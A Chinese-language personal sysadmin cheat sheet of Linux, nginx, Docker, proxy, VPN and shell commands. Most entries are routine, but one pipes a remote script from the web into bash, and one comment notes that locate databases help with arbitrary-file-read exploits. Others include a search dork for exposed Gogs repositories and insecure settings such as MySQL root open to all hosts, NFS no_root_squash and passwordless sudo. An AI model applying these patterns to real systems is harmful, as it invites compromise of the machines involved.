#curl 中 –socks5-hostname 与 –socks5 有什么区别呢
#如果你希望 DNS 查询通过代理服务器进行,请使用 --socks5-hostname 选项。如果你希望 DNS 查询在本地进行,请使用 --socks5 选项
curl --socks5 127.0.0.1:1080 https://www.example.com
curl --socks5-hostname 127.0.0.1:1080 https://www.example.com
curl -k --socks5-hostname 127.0.0.1:1086 --doh-url https://1.1.1.1/dns-query https://www.google.com
https_proxy=127.0.0.1:8080 curl -k https://www.google.com
http_proxy=127.0.0.1:8080 curl -k http://www.google.com
#安装trzsz
wget https://gitee.com/tinatmp/trzsz-bin/releases/download/1/trz -O /usr/local/bin/trz && wget https://gitee.com/tinatmp/trzsz-bin/releases/download/1/tsz -O /usr/local/bin/tsz && wget https://gitee.com/tinatmp/trzsz-bin/releases/download/1/trzsz -O /usr/local/bin/trzsz && chmod +x /usr/local/bin/trz && chmod +x /usr/local/bin/tsz && chmod +x /usr/local/bin/trzsz
#debian11 nfs-server安装
#debian11 nfs-server安装
apt-get install nfs-kernel-server
mkdir /nfs
echo "/nfs *(rw,sync,no_subtree_check,no_root_squash)" >> /etc/exports
systemctl restart nfs-server
systemctl status nfs-server
#nfs-client
apt-get install nfs-common
systemctl enable rpcbind && systemctl start rpcbind
mount 192.168.3.244:/nfs /mnt
#golang跨平台编译
go env -w GOOS=darwin
go env -w GOOS=linux
#macos刷新dns记录
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
#nginx的反向代理
upstream tomcats {
server xxx.xxx.com:80;
}
server {
listen 80;
server_name xxx.xxx.xxx.xxx.109;
location / {
proxy_pass_header Server;
proxy_set_header Host xxx.xxx.com;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Scheme $scheme;
proxy_pass http://tomcats;
}
}
#linux中的鲁大师 测试机器性能用
wget -qO- https://raw.githubusercontent.com/masonr/yet-another-bench-script/master/yabs.sh | bash
#debian中自动安装缺少的固件
apt-get install isenkram
isenkram-autoinstall-firmware
#sed相关1
#在匹配关键字的上一行或者下一行添加内容
#a=after i=insert
sed -i '/zks/avvvvvvv' t.txt
sed -i '/zks/ivvvvvvv' t.txt
#同等于
sed -i '/zks/a\vvvvvvvvv' t.txt
sed -i '/zks/i\vvvvvvvvv' t.txt
#配合find查找处理内容
find . -name server.xml|xargs sed -i '/directory/i <!--'
find . -name server.xml|xargs sed -i '/pattern="%h/a -->'
#在某行(指具体行号)前或后加一行内容
sed "2i PermitRootLogin yes" t.txt
sed "2a PermitRootLogin yes" t.txt
#先匹配zks,n命令->表示移动到匹配行的下一行,在下一行完成替换
#&表示继续输出之前的匹配文字 \n表示换行
#也可用N代替n命令,不过有区别 n表示对下一行执行匹配,而N只是表示读取下一行到匹配区域,后边的命令,是对每一行进行匹配
sed '/zks/{n;s/asdf/year1/;}' t.txt
sed '/zks/{n;s/asdf/year1\n&/g;}' t.txt
#sshpass中的特殊字符
sshpass -p '!@#@@111'
#切记别使用双绰号 sshpass -p "!@#@@111"
#相关条件缩写参数
-e filename 如果 filename存在,则为真
-d filename 如果 filename为目录,则为真
-f filename 如果 filename为常规文件,则为真
-L filename 如果 filename为符号链接,则为真
-r filename 如果 filename可读,则为真
-w filename 如果 filename可写,则为真
-x filename 如果 filename可执行,则为真
-s filename 如果文件长度不为0,则为真
-h filename 如果文件是软链接,则为真
-b 被测对象是块设备
-c 被测对象是字符设备
-p 被测对象是管道
-h 被测文件是符号连接
-L 被测文件是符号连接
-S(大写) 被测文件是一个socket
-t 关联到一个终端设备的文件描述符。用来检测脚本的stdin[-t0]或[-t1]是一个终端
-r 文件具有读权限,针对运行脚本的用户
-w 文件具有写权限,针对运行脚本的用户
-x 文件具有执行权限,针对运行脚本的用户
-u set-user-id(suid)标志到文件,即普通用户可以使用的root权限文件,通过chmod +s file实现
-k 设置粘贴位
-O 运行脚本的用户是文件的所有者
-G 文件的group-id和运行脚本的用户相同
-N 从文件最后被阅读到现在,是否被修改
f1 -nt f2 文件f1是否比f2新
f1 -ot f2 文件f1是否比f2旧
f1 -ef f2 文件f1和f2是否硬连接到同一个文件
#shell判断文件夹是否存在,如果文件夹不存在,创建文件夹
#!/bin/bash
if [ ! -d "/data/test" ]; then
mkdir /data/test
fi
#可缩写为
[ -d "/data/test" ] || mkdir /data/test
#或者缩写为
[ ! -d "/data/test" ] && mkdir /data/test
#shell判断文件,目录是否存在或者具有权限
#!/bin/bash
folder="/data/test/"
file="/data/test/log"
# -x 参数判断 $file 是否具有可执行权限
if [ ! -x "$file" ]; then
chmod +x $file
fi
#数字相关
-eq 等于,如:if [ "$a" -eq "$b" ]
-ne 不等于,如:if [ "$a" -ne "$b" ]
-gt 大于,如:if [ "$a" -gt "$b" ]
-ge 大于等于,如:if [ "$a" -ge "$b" ]
-lt 小于,如:if [ "$a" -lt "$b" ]
-le 小于等于,如:if [ "$a" -le "$b" ]
< 小于(需要双括号),如:(("$a" < "$b"))
<= 小于等于(需要双括号),如:(("$a" <= "$b"))
> 大于(需要双括号),如:(("$a" > "$b"))
>= 大于等于(需要双括号),如:(("$a" >= "$b"))
#字符串
-z 字符串为null,即长度为0
-n 字符串不为null,即长度不为0
#test 相关
test -f /path/to/file
#等价
[ -f /path/to/file ]
# echo $? 返回上一条命令的执行结果 0为真 1为假
[root@k8s-master ~]# [ -f /etc/passwd ]
[root@k8s-master ~]# echo $?
0
[root@k8s-master ~]# [ -f /etc/passwd1 ]
[root@k8s-master ~]# echo $?
1
# &&与||区别
# 左边命令为真 则不执行右边命令
# 左边命令为假 则执行右边命令
comand1 || comand2
# 左边命令为真 则执行右边命令
# 左边命令为假 则不执行右边命令
comand1 && comand2
# 如果当前目录不存在文件 myfile,则创建一个名为 myfile 的新文件
test -e myfile || touch myfile
# 如果当前目录不存在文件 myfile,则创建一个名为 myfile 的新文件
[ ! -e myfile ] && touch myfile
# 创建一个文件,并写入内容
echo "hello world" > example.txt
# 尝试执行 cat 命令来显示文件内容
cat example.txt || echo "找不到文件"
# 尝试执行一个命令,如果执行失败,就执行另一个命令
./my_script.sh || echo "执行失败"
$ cd somedir || echo "Directory not found"
#同理可在.gitlab-ci.yml 的script中写跳过错误的命令
docker rmi $images || true
#查看进程属于哪个容器(其实就是查看cgroup的名称)
ps -e -o pid,cmd,comm,cgroup
#批量导出docker服务下的多副本的日志文件
docker ps | grep axyb-stg | awk -F '8080/tcp' '{print $2}' | awk '{print $1}' | xargs -i docker cp {}:/logs ./{}
#editcap使用1
#Mac下解决editcap等wireshark配套工具not found
#先安装wireshark
#cd /Applications/Wireshark.app/Contents/MacOS
#根据时间来拆分,利用-A 起始时间和-B 截止时间来提去某个时间段的数据。
editcap -A <起始时间> -B <截止时间> <源文件名> <目的文件名>
editcap -A "2022-10-25 15:07:00" -B "2022-10-25 15:09:00" ~/Downloads/aroduct1.pcap ~/Downloads/out1.pcap
#在curl中需要json为一行字符
#将多行json压缩为一行
1. 打开chrome 中的console
2.输入
var obj = {xxxxx};
JSON.stringify(obj);
或者在线工具 比如:
https://www.bejson.com/zhuanyi/
https://www.sojson.com/yasuoyihang.html
#mysql 批量kill
echo "show full processlist" | mysql -uroot -pxxxx -h127.0.0.1 | grep -i "update" | grep -i "xxxx_prod" | awk '{print $1}' | xargs -i echo "kill {};" | mysql -uroot -pxxxx -h127.0.0.1
# 查看内存占用的前10位
ps aux | sort -k4,4nr | head -n 10
ps aux | awk '{print $2, $4, $6, $11}' | sort -k3rn | head -n 10
#mac 下wireshark抓包解密https请求
# 1.启动chrome浏览器 会附加握手包
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --ssl-key-log-file=/Users/xxx/tmp/sslkeylog.log
# 2. 在本机或者服务器用tcpdump抓包
tcpdump port 443 and host 1.1.1.1 -w t5.pcap
# 3.下载数据包到本地并用wireshare打开
# 菜单栏 -> Wireshark -> Preferences -> Protocols -> SSL 在(Pre)-Master-Secret log filename填入刚才启动时指定的文件路径
# 然后在wireshark中过滤栏输入ssl,随便找个包
#右键 -> Follow -> SSL Stream
#即可看到解密后的http请求。
#iptables断开已经连接的网络,类似tcpkill
iptables -I INPUT -m state --state NEW,RELATED,ESTABLISHED -m tcp -p tcp --dport 899 -j DROP
# 删除添加的防火墙规则
iptables -L -n --line-number # 查看添加的规则的序号
iptables -D INPUT 1 # 删除某个序号对应的规则
#linux 保存文件 文件路径的数据库 可在任意文件读取漏洞中利用 前提是机器安装了locate
/var/lib/mlocate/mlocate.db
/var/lib/locate.db
#Linux系统中有locate命令,而这两个数据库中包含了系统内的所有本地文件路径信息。
#可利用locate命令将数据输出成文件。
# systemd-cgls 作用是递归地显示指定 CGroup 的继承链 比如可以查看某个进程是否是属于docker容器下的进程
#命令行工具:
dperf #一个100Gbps的网络性能与压力测试软件https://github.com/baidu/dperf
dust #代替du https://github.com/bootandy/dust
duf #代替df https://github.com/muesli/duf
procs #代替ps https://github.com/dalance/procs
bottom #代替top https://github.com/ClementTsang/bottom
exa #代替 ls https://github.com/ogham/exa
zoxide #代替 cd https://github.com/ajeetdsouza/zoxide
ripgrep #代替grep https://github.com/BurntSushi/ripgrep
bat #代替cat https://github.com/sharkdp/bat
httpid #代替curl https://github.com/httpie/httpie
hyperfine #代替time https://github.com/sharkdp/hyperfine
sed -i 's/mult_offline_start/offline_start/' xx.txt
#杀进程1
1.
ps aux|grep alert1.py|grep -v grep|awk '{print "kill -9 " $2}' |sh
2.
ps aux|grep alert1.py|grep -v grep|awk '{print $2}' | xargs kill -9
3.
pidlist=`ps aux |grep alert1.py |grep -v grep|awk '{print $2}'`
kill -9 $pidlist
# 也可用ps -elf 代替
#nginx 反向代理websocket 添加https wss方式
#证书可以在 来此加密 https://letsencrypt.osfipin.com/ 免费申请
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
server {
server_name wss.xxx.xxx;
listen 81 ssl;
ssl_certificate /etc/nginx/cert/fullchain.crt;
ssl_certificate_key /etc/nginx/cert/private.pem;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers off;
# 开启OCSP stapling
ssl_stapling on;
ssl_stapling_verify on;
location / {
proxy_pass https://api.hubi.pro;
proxy_read_timeout 300s;
proxy_send_timeout 300s;
proxy_set_header Host api.hubi.pro;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_ssl_server_name on;
}
}
#nginx 反向代理websocket 不加密 ws方式
# nginx的方式
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
server {
server_name xxx.pro;
listen 81;
location / {
proxy_pass https://api.hubi.pro;
proxy_read_timeout 300s;
proxy_send_timeout 300s;
proxy_set_header Host api.hubi.pro;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_ssl_server_name on;
}
}
#redir方式
redir :2448 143.204.86.1:443
#本地修改hosts文件
x.x.x.x api.hubi.pro
#supervisor
#容器中
apt-get install supervisor
service supervisor start
/etc/supervisor/conf.d/test.conf
[program:test]
command = /usr/local/bin/python -u /opt/a.py
directory = /opt
user = root
startsecs = 3
redirect_stderr = true
stdout_logfile_maxbytes = 50MB
stdout_logfile_backups = 10
stdout_logfile = /opt/app.log
service supervisor stop
service supervisor start
supervisorctl status
supervisorctl start test
supervisorctl stop test
# 2>&1 后台任务
# 注意顺序: 2>&1 应该放到 >log 的后面
nohup java -jar app.jar >log 2>&1 &
nohup python -u xxx.py >log 2>&1 &
#可简写为
nohup java -jar app.jar &>log & #建议按此方式
#或者
nohup java -jar app.jar >&log &
#docker中运行crontab任务
#debian内核
apt-get update
apt-get install cron
service cron start
#dockerfile1
FROM x.x.x.x:80/public/base-python:0.0.2
WORKDIR /opt
ADD . /opt/
ENV QUANTIFY_ENV=prod
{docker_copy_str}
RUN test -f /opt/requirements.txt && pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple && pip install -r /opt/requirements.txt || true
ENTRYPOINT ["tini", "--"]
CMD ["/bin/bash","-c","/usr/local/bin/python /opt/{service-exec}"]
#nginx 反向代理https中出现502的错误
location ^~ /
{
proxy_pass https://www.binance.com/;
proxy_set_header Host www.binance.com;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header REMOTE-HOST $remote_addr;
add_header X-Cache $upstream_cache_status;
proxy_ssl_server_name on;
}
# proxy_ssl_server_name on; 这句是重点
#curl 下使用代理
http_proxy=localhost:8080 https_proxy=localhost:8080 curl -k https://ifconfig.io
#参考:https://segmentfault.com/a/1190000039292756
curl -x “http://192.168.3.100:5087” “http://ifconfig.me”
#nginx 禁止spring cloud Gateway 的 actuator地址
location ~* .*/actuator.* {
return 403;
}
location ^~ /xxx/actuator {
return 403;
}
#防止ssh暴力破解
# 机器内核版本太老,未安装fail2ban
# cat /root/Denyhosts/Denyhosts.sh
#!/bin/bash
#Denyhosts SHELL SCRIPT
cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|grep -v '127.0.0.1'|sort|uniq -c|awk '{print $2"=" $1;}' >/root/Denyhosts/Denyhosts.txt
DEFINE="10"
for i in `cat /root/Denyhosts/Denyhosts.txt`
do
IP=`echo $i|awk -F= '{print $1}'`
NUM=`echo $i|awk -F= '{print $2}'`
if [ $NUM -gt $DEFINE ]
then
ipExists=`grep $IP /etc/hosts.deny |grep -v grep |wc -l`
if [ $ipExists -lt 1 ]
then
echo "sshd:$IP" >> /etc/hosts.deny
fi
fi
done
cat >/etc/cron.d/denyssh <<eof
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /root/Denyhosts/Denyhosts.sh
eof
#git 修改 remote url
#查看remote url
git ls-remote --get-url origin
#修改remote url
git remote set-url origin http://xxx
#另一种办法
git remote rm origin
git remote add origin http://xxx
#nginx 端口转发
apt-get update && apt-get upgrade
apt-get install nginx
apt-get install python3-certbot-nginx
certbot --nginx --agree-tos --redirect --hsts --staple-ocsp --email you@example.com -d www.example.com
#nginx.conf
events {
worker_connections 102400;
# multi_accept on;
}
stream{
server{
listen 25 ssl;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_certificate /etc/letsencrypt/live/test.xx.vg/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/test.xx.vg/privkey.pem;
proxy_pass eth.ss.xx.me:1883;
}
}
cat > /opt/cert.sh <<EOF
/usr/bin/certbot renew --cert-name test.xx.vg --force-renewal
nginx -s reload
EOF
chmod +x /opt/cert.sh
#每隔25天生成一次
cat >/etc/cron.d/nginxcert <<eof
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
00 00 */25 * * root /opt/cert.sh
eof
#利用nginx把TCP端口转换为支持ssl加密的
worker_connections 10240;
stream{
server{
listen 25 ssl;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_certificate pem;
ssl_certificate_key key;
#proxy_pass poolip:port
proxy_pass xxx.pool.com:5555;
}
}
http{}
#端口重定向、转发
#安装
apt-get install socat
#使用
nohup socat TCP-LISTEN:6688,reuseaddr,fork TCP:xxx.pool.com:6688 >> socat.log 2>&1 & disown
#端口重定向、转发
#安装
apt-get install redir
#使用
redir :6666 xx.pool.com:6688 #监听访问本服务器的6666 并转发到xx.pool.com 的6688端口下
redir --lport=80 --cport=22 --caddr=192.168.0.5 --debug
redir --lport=80 --cport=22 --caddr=192.168.0.5 --syslog --name=redirSSH
#linux 快速 proxy 小脚本
root@debian:/usr/local/bin# cat /usr/local/bin/fq
#!/bin/bash
#link="socks5://127.0.0.1:1080"
link="http://127.0.0.1:1087"
proxy=$link \
http_proxy=$link \
https_proxy=$link \
ftp_proxy=$link \
rsync_proxy=$link \
all_proxy=$link \
no_proxy="localhost,127.0.0.1,localaddress,.localdomain.com" \
server_proxy=$link \
PROXY=$link \
HTTP_PROXY=$link \
HTTPS_PROXY=$link \
FTP_PROXY=$link \
RSYNC_PROXY=$link \
ALL_PROXY=$link \
NO_PROXY="localhost,127.0.0.1,localaddress,.localdomain.com" \
SERVER_PROXY=$link \
$*
chmod +x /usr/local/bin/fq
#使用
fq curl https://www.google.com.hk/
#linux下安装v2ray客户端
mkdir /opt/v2ray
cat >/opt/v2ray/config.json <<EOF
{
"log": {
"error": "",
"loglevel": "info",
"access": ""
},
"inbounds": [
{
"listen": "0.0.0.0",
"protocol": "socks",
"settings": {
"udp": false,
"auth": "noauth"
},
"port": "1080"
},
{
"listen": "0.0.0.0",
"protocol": "http",
"settings": {
"timeout": 360
},
"port": "1087"
}
],
"outbounds": [
{
"mux": {
"enabled": false,
"concurrency": 8
},
"protocol": "vmess",
"streamSettings": {
"network": "tcp",
"tcpSettings": {
"header": {
"type": "none"
}
},
"security": "none"
},
"tag": "proxy",
"settings": {
"vnext": [
{
"address": "xxx.xxx.xxx",
"users": [
{
"id": "BF0802AC-C401-D599-0363-64BB7E6B18AC",
"alterId": 0,
"level": 0,
"security": "aes-128-gcm"
}
],
"port": 27402
}
]
}
},
{
"tag": "direct",
"protocol": "freedom",
"settings": {
"domainStrategy": "UseIP",
"redirect": "",
"userLevel": 0
}
},
{
"tag": "block",
"protocol": "blackhole",
"settings": {
"response": {
"type": "none"
}
}
}
],
"dns": {},
"routing": {
"settings": {
"domainStrategy": "AsIs",
"rules": []
}
},
"transport": {}
}
EOF
docker run -d --restart=always --name v2ray -v /opt/v2ray:/etc/v2ray -p 1080:1080 -p 1087:1087 v2fly/v2fly-core
# 客户机执行 或者安装 proxychains
export https_proxy=http://127.0.0.1:1087
export http_proxy=http://127.0.0.1:1087
curl https://www.google.com
# 可利用小工具 https://github.com/arkrz/v2sub 实现订阅功能
#nginx之虚拟目录之rewrite alias
# http://127.0.0.1:81/abc/a.html #真实地址
# http://127.0.0.1:81/newdir/a.html # 指向真实地址
# 方法1 alias
location /newdir/ {
alias /var/www/html/abc/;
}
# 方法2 rewrite
location /newdir/ {
root /var/www/html/abc/;
rewrite ^/newdir/(.*?)$ /$1 break;
}
#方法3 mkdir
mkdir /var/www/html/newdir/
copy /var/www/html/abc/a.html /var/www/html/newdir/a.html
#python pip添加 加速源
mkdir ~/.pip
cat > ~/.pip/pip.conf <<EOF
[global]
timeout=600
index-url=https://mirrors.aliyun.com/pypi/simple/
trusted-host=mirrors.aliyun.com
EOF
#aws修改、删除 置放群组
aws ec2 modify-instance-placement --instance-id i-0e1xxx343100915c --group-name test1-group #修改
aws ec2 modify-instance-placement --instance-id i-004c5xxxx1ca954 --group-name "" #删除
#google gogs
inurl:"/explore/repos" "发现"
#rancher跨项目访问:
#服务发现->添加DNS记录->外部域名->目标域名->kafka2.public-common.svc.cluster.local
kafka2.public-common.svc.cluster.local
服务名.命名空间名.svc.cluster.local
#mysql允许所有IP连接
mysql>update user set host='%' where user='root';
mysql>flush privileges;
#debian设置ip
root@debian:/etc/network# cat interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
allow-hotplug enp6s0
iface enp6s0 inet static
address 192.168.3.100
netmask 255.255.255.0
gateway 192.168.3.1
#jdk
#java8.sh
JAVA_HOME=/opt/jdk8
JRE_HOME=$JAVA_HOME/jre
PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin
CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export JAVA_HOME JRE_HOME PATH CLASSPATH
#java7.sh
JAVA_HOME=/opt/jdk7
JRE_HOME=$JAVA_HOME/jre
PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin
CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export JAVA_HOME JRE_HOME PATH CLASSPATH
#cp java8.sh /etc/profile.d/
#alpine 添加telnet
apk add busybox-extras
#alpine加速
sed -i "s@http://dl-cdn.alpinelinux.org/@https://repo.huaweicloud.com/@g" /etc/apk/repositories
#aws linux 添加ssh用户
sudo -s
adduser --shell /bin/bash --system --disabled-password newuser
su newuser
cd ~
mkdir .ssh
ssh-keygen -t RSA
cp id_rsa.pub authorized_keys
chmod 700 ~/.ssh
echo "newuser ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers.d/90-cloud-init-users
cat id_rsa #保存到本地xxx.pem,再用ssh工具进行连接
#简单的web ssh
shellinabox
#centos安装软阵列
yum install mdadm
gdisk /dev/nvme1n1 # gdisk /dev/nvme2n1
Command (? for help): n #创建一个分区
Hex code or GUID (L to show codes, Enter = 8300): fd00 # linux raid 类型
Command (? for help): w #保存配置
#创建raid1
mdadm --create /dev/md1 -v --level=1 --raid-devices=2 /dev/nvme2n1p1 /dev/nvme1n1p1
cat /proc/mdstat #查看raid1的同步状态, 等同步完成后再格式化文件类型
mkfs.xfs /dev/md1
mkdir /md1
mount /dev/md1 /md1/
#开机自动挂载
echo "/dev/md1 /md1 xfs defaults 0 0" >> /etc/fstab
#开机自动加载raid配置
echo DEVICE /dev/nvme2n1p1 /dev/nvme2n1p2 > /etc/mdadm.conf
mdadm -Dvs >> /etc/mdadm.conf
#最终 /etc/mdadm.conf 文件内容
[root@localhost /]# cat /etc/mdadm.conf
DEVICE /dev/nvme1n1p1 /dev/nvme2n1p1
ARRAY /dev/md1 level=raid1 num-devices=2 metadata=1.2 name=localhost.localdomain:1 UUID=3dba3272:ade1a95a:db60439c:03beaadb
devices=/dev/nvme1n1p1,/dev/nvme2n1p1
#MacOS安装app提示已损坏修复指令
sudo xattr -rd com.apple.quarantine /Applications/xxxxxx.app
#在apt-get update时出现 E: Repository ‘http://security.debian.org/debian-security buster/updates InRelease’ changed its ‘Suite’ value from ‘stable’ to ‘oldstable’
apt-get update --allow-releaseinfo-change
#利用xargs清空日志
#-i 或者是-I 将xargs的每项名称,一般是一行一行赋值给{},可以用{}代替
#-n num 后面加次数,表示命令在执行的时候一次用的argument的个数,默认是用所有的
find /opt/app -name "*.out" -size +1000M |xargs -i -p -n 1 sh -c "echo > {}"
#清空docker容器的命令行日志
du -sh /var/lib/docker/containers |grep G| awk -F " " '{print $2}' | xargs -i sh -c "> {}/{}-json.txt"
cd /var/lib/docker/containers/ && du -sh ./* |grep G| awk -F " " '{print $2}' | sed 's/.\///' | xargs -i sh -c "> {}/{}-json.log"
#kubectl 切换上下文
#kubectl 切换context
kubectl config get-contexts
kubectl config use-context demo-rancher-demo2
kubectl config current-context
kubectl get nodes
#kubectl 重启pod
#通过设置无用的环境变量来实现重启pod
kubectl -n default set env deployment/test12 DEPLOY_DATE=1
#etcd导出数据
ETCDCTL_API=3 etcdctl --cacert=/etc/kubernetes/ssl/kube-ca.pem --cert=/etc/kubernetes/ssl/kube-node.pem --key=/etc/kubernetes/ssl/kube-node-key.pem --endpoints=https://127.0.0.1:2379/ get / --prefix --keys-only | sort | uniq | xargs -I{} sh -c 'ETCDCTL_API=3 etcdctl --cacert=/etc/kubernetes/ssl/kube-ca.pem --cert=/etc/kubernetes/ssl/kube-node.pem --key=/etc/kubernetes/ssl/kube-node-key.pem --endpoints=https://127.0.0.1:2379 get {} >> output.data && echo "" >> output.data'
ETCDCTL_API=3 etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://127.0.0.1:2379/ get / --prefix --keys-only | sort | uniq | xargs -I{} sh -c 'ETCDCTL_API=3 etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://127.0.0.1:2379 get {} >> output.data && echo "" >> output.data'
#aws ec2磁盘扩容
lsblk #确定/根分区所在的序号,默认应该是为1
growpart /dev/nvme0n1 1
resize2fs /dev/nvme0n1p1
#使用docker-connector打通宿主机与docker网络
brew install docker-connector
#生成16进制字符列表
gzip -c /etc/passwd | xxd -p -c 16 | sed -e 's/../0x&,/g'
cat /etc/passwd | xxd -p -c 16 | sed -e 's/../0x&,/g'
#/proc/pid/fd 中socket:number 解析
ls -al /proc/pid/fd/
4 -> 'socket:[78607329]'
查看 /proc/net/tcp 表对应的inode id 项目 查看编码后的源地址 目的地址等信息,用上面网页工具转码后查看 或者直接 lsof
#/proc/net/tcp 简单解析
46: 010310AC:9C4C 030310AC:1770 01
(源IP 源端口) (目的IP 目的端口)
源IP:010310AC ->01 03 10 AC --16进制转10进制--> 1 3 16 172 --倒序----> 172.16.3.1
源端口:9C4C -->9C4C--16进制转10进制-->40012
(目的IP:030310AC->03 03 10 AC --16进制转10进制--> 3 3 16 172 --倒序----> 172.16.3.3
目的端口:1770-->1770--16进制转10进制-->6000
lsof -i -a -p PID
2 -> 'pipe:[78480472]'
则lsof -n -P | grep pipeid 查看管道的两端
#例如
# 3: 92C111AC:0016 40C87472:8AE9 01 00000040:00000000 01:00000018 00000000 0 0 2397438 4 00000000c8430690 24 4 29 20 -1
92 C1 11 AC:0016
146 193 17 172 :22
172.17.193.146:22
40 C8 74 72:8AE9
64 200 116 114:35561
114.116.200.64:35561
#批量杀掉进程
kill -9 $(pidof 进程名关键字)
#debian10 升级到debian11
cp /etc/apt/sources.list /etc/apt/sources.list.bak0
cat >/etc/apt/sources.list <<eof
deb http://cdn-aws.deb.debian.org/debian buster main
deb-src http://cdn-aws.deb.debian.org/debian buster main
deb http://security.debian.org/debian-security buster/updates main
deb-src http://security.debian.org/debian-security buster/updates main
deb http://cdn-aws.deb.debian.org/debian buster-updates main
deb-src http://cdn-aws.deb.debian.org/debian buster-updates main
deb http://cdn-aws.deb.debian.org/debian buster-backports main
deb-src http://cdn-aws.deb.debian.org/debian buster-backports main
eof
apt-get update &&apt install gcc-8-base -y && apt-get upgrade -y
init 6
cat >/etc/apt/sources.list <<eof
deb http://deb.debian.org/debian bullseye main contrib non-free
deb http://deb.debian.org/debian bullseye-updates main contrib non-free
deb http://security.debian.org/debian-security bullseye-security main
deb http://ftp.debian.org/debian bullseye-backports main contrib non-free
eof
#建议用国内镜像加速
cat >/etc/apt/sources.list <<eof
deb http://mirrors.huaweicloud.com/debian bullseye main contrib non-free
deb http://mirrors.huaweicloud.com/debian bullseye-updates main contrib non-free
deb http://mirrors.huaweicloud.com/debian-security bullseye-security main
deb http://mirrors.huaweicloud.com/debian bullseye-backports main contrib non-free
eof
apt-get update && apt full-upgrade -y
init 6
apt --purge autoremove
init 6
cat /etc/os-release
#临时修改某个进程的 max open files 参数
#对于已经启动的进程,如果发现在做时空证明的时候报 too many open files 错误,而此时如果你又不想重启进程,可以使用下面方法动态配置。
prlimit --pid <pid> --nofile=1048576:1048576
#reredirect -m a1.txt PID 无响应问题
#可尝试先执行
reptyr PID
#查看后台运行程序的输出 stdout ( nohup、setsid、(&)和disown 这几种方式的后台运行都可以)
#reptyr 效果不好 仅供参考
apt-get install reptyr
reptyr PID
#reredirect 效果不错,推荐
git clone https://github.com/jerome-pouiller/reredirect/
make
make install
reredirect -m output_filename PID
#strace 可读性不高 具体还在再调整
PID=some_process_id sudo strace -f -e trace=write -e verbose=none -e write=1,2 -q -p $PID -o "| grep '^ |' | cut -c11-60 | sed -e 's/ //g' | xxd -r -p"
#openvpn禁止访问某个IP
docker exec -it openvpn /bin/bash
iptables -A FORWARD -m state --state NEW,ESTABLISHED,RELATED -d 10.1.4.19 -j REJECT
#docker 安装openvpn
#docker安装openvpn --begin
export OVPN_DATA=openvpn-data
docker volume create --name $OVPN_DATA #生成文件夹/var/lib/docker/volumes/openvpn-data/_data
#SERVER_IP为服务器的外网IP.比如1.2.3.4
docker run -v $OVPN_DATA:/etc/openvpn --rm kylemanna/openvpn ovpn_genconfig -d -c -C 'AES-256-CBC' -u udp://SERVER_IP -s 192.168.100.0/24
#生成密钥文件,输入密钥和CA名称
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn ovpn_initpki
#开启特权 记得把外网的UDP1194端口映射进来
docker run -v $OVPN_DATA:/etc/openvpn -d -p 1194:1194/udp --restart=on-failure:10 --cap-add=NET_ADMIN --name=openvpn --privileged=true kylemanna/openvpn
#注意
#1. openvpn.conf 需要添加
route 192.168.100.1 255.255.255.0
#2. ovpn_env.sh
declare -x OVPN_DEFROUTE=1
declare -x OVPN_ROUTES=([0]="192.168.100.1/24")
#3. 默认DNS为8.8.8.8 8.8.4.4 建议修改为因内的DNS 比如 114.114.114.114
#4. 可以修改 yzytesta.ovpn 文件中的 remote 1.2.3.4 11194 udp 默认的1194端口
#添加用户
#添加不需要密码的用户
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa build-client-full testuser nopass
#添加需要密码的用户
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa build-client-full testuser
#导出用户证书
docker run -v $OVPN_DATA:/etc/openvpn --rm kylemanna/openvpn ovpn_getclient testuser > testuser.ovpn
#删除用户证书
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa revoke user
#更新证书数据库
